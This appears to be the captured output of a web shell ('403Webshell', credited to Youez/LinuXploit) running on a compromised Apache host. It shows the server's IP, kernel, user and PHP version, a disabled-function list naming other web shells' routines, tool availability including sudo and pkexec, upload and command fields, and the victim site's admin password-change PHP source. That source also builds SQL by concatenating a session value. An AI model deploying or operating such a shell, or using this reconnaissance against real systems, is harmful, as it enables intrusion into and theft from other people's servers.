403Webshell
Server IP : 103.119.228.120  /  Your IP : 3.145.85.74
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/hendraso/public_html/Modules/Controller/Admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/hendraso/public_html/Modules/Controller/Admin/Changepassword.php
<?php
class Controller_Admin_Changepassword extends GeneralAction {

	protected function do_show() {
		$tpl = parent::do_show();
        $tpl->assign('catName', 'User');
        $tpl->assign('pageName', 'Change Password');
        $tpl->assign('pageDefault',  Config::load()->root() . "/Templates/Admin/changePassword.html");
		$tpl->display("../Templates/Admin/main.html");
	}
	protected function do_update() {
			require Config::load()->root() . '/Additional/passwordLib.php';
		    $sql = "SELECT udafId, udafPassword, udafHash FROM user WHERE udafId='" . $_SESSION['userId'] . "' and udafStatus='0'";
			$cekUser = Generaldb::instance()->dbgetone($sql);
			$oldpass = $_POST['oldpassword'];
			$newpass = $_POST['newpassword'];
			$cnpass = $_POST['cnpassword'];
			$error = "";
			if(empty($oldpass)) {
				$error .= "Old Password Is Empty \n";
			}
			if(empty($newpass)) {
				$error .= "New Password Is Empty \n";
			}
			if(empty($cnpass)) {
				$error .= "Confirm Password Is Empty \n";
			}
			if($newpass != $cnpass) {
				$error .= "Confirm Password Not Match \n";
			}
			if(empty($error)) {
				if (password_verify(trim($oldpass.$cekUser['udafHash']), trim($cekUser['udafPassword']))) {
					$options = array(
							'cost' => 12,
						);
					$password = password_hash($newpass . $cekUser['udafHash'], PASSWORD_BCRYPT, $options)."\n";
					$update = Database::build()->updateArray("user", 'udaf', array('udafPassword' => $password), "udafId = '".$_SESSION['userId']."'");
					return array('status' => 'ok', 'id' => $_SESSION['userId']);
				} else {
					return array('status' => 'error', 'session' => false, 'error' => 'Check Your Password');
				}
			}else{
				return array('status' => 'error', 'session' => false, 'error' => $error);
			}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit